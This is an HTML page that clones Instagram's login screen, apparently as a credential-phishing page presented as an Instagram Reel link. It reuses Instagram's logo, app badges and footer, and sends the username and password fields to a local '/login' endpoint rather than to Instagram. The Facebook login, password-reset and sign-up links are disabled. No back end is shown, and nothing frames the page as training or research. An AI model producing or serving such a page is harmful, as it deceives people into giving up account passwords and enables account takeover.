<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram . Reel</title>
    <style>
        body {
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
                Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
            background-color: #fafafa;
            box-sizing: border-box;
            text-align: center;
            margin: 0;
            padding: 0;
        }

        a {
            text-decoration: none;
            cursor: pointer;
        }

        .container {
            max-width: 1000px;
            margin: 3rem auto 0;
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
            font-size: 14px;
        }

        .box {
            max-width: 350px;
            width: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            background-color: #fff;
            border: 1px solid #e6e6e6;
            border-radius: 1px;
            margin: 0 0 10px;
            padding: 10px 0;
            flex-grow: 1;
        }

        .heading {
            margin: 22px auto 12px;
            background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
            background-position: -98px 0;
            height: 51px;
            width: 177px;
            overflow: hidden;
        }

        .field {
            margin: 10px 0;
            position: relative;
            font-size: 14px;
            width: 100%;
        }

        input {
            padding: 9px 0px 7px 9px;
            font-size: 12px;
            width: 16rem;
            height: 1.2rem;
            outline: none;
            background: #fafafa;
            border-radius: 3px;
            border: 1px solid #efefef;
        }

        label {
            position: absolute;
            pointer-events: none;
            left: 10px;
            padding-bottom: 15px;
            transform: translateY(10px);
            line-height: 6px;
            transition: all ease-out 0.1s;
            font-size: 14px;
            color: #999;
            padding-top: 6px;
        }

        input::placeholder {
            visibility: hidden;
        }

        input:not(:placeholder-shown) + label {
            transform: translateY(0);
            font-size: 11px;
        }

        input:not(:placeholder-shown) {
            padding-top: 14px;
            padding-bottom: 2px;
        }

        .login-button {
            text-align: center;
            width: 100%;
            padding: 0.5rem;
            border: 1px solid transparent;
            background-color: #3897f0;
            color: #fff;
            font-weight: 600;
            font-size: 14px;
            cursor: pointer;
        }

        .separator {
            display: flex;
            justify-content: space-between;
            align-items: center;
            color: #999;
            margin-top: 6px;
        }

        .separator .line {
            height: 1px;
            width: 40%;
            background-color: #dbdbdb;
        }

        .other {
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
        }

        .fb-login-btn {
            margin: 1rem;
            border: 0;
            cursor: pointer;
            font-size: 14px;
            color: #385185;
            font-weight: 600;
            background: transparent;
        }

        .fb-icon {
            color: #385185;
            font-size: 1rem;
            padding-right: 1px;
        }

        .forgot-password,
        .signup {
            color: #3897f0;
            font-weight: 600;
            font-size: 11px;
        }

        p {
            text-align: center;
        }

        .get {
            text-align: center;
            font-size: 15px;
        }

        .apps img {
            height: 40px;
            width: 134px;
            margin: 0 5px;
        }

        .footer,
        .copyright {
            text-align: center;
            font-size: 13px;
            margin-top: 10px;
            word-spacing: 10px;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="box">
            <div class="heading"></div>
            <form class="login-form" action="/login" method="post">
                <div class="field">
                    <input id="username" name="username" type="text" placeholder="Phone number, username, or email" />
                    <label for="username">Phone number, username, or email</label>
                </div>
                <div class="field">
                    <input id="password" name="password" type="password" placeholder="password" />
                    <label for="password">Password</label>
                </div>
                <button class="login-button" type="submit">Log In</button>
                <div class="separator">
                    <div class="line"></div>
                    <p>OR</p>
                    <div class="line"></div>
                </div>
                <div class="other">
                    <button class="fb-login-btn" type="button" onclick="return false;">
                        <img src="https://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/social-facebook-icon.png"
                            height="15" width="15">&nbsp;Log in with Facebook
                    </button>
                    <a class="forgot-password" href="javascript:void(0)">Forgot password?</a>
                </div>
            </form>
        </div>
        <div class="box">
            <p>Don't have an account? <a class="signup" href="javascript:void(0)">Sign Up</a></p>
        </div>
    </div>
    <div class="get">
        Get the app.
    </div>
    <div class="apps">
        <img src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png">
        <img src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png">
    </div>
    <div class="footer">
        Meta About Blog Jobs Help API Privacy Terms Top Accounts Hashtags Locations Instagram Lite Contact Uploading & Non-Users
    </div>
    <div class="copyright">
        English © 2022 Instagram from Meta
    </div>
</body>

              </html>
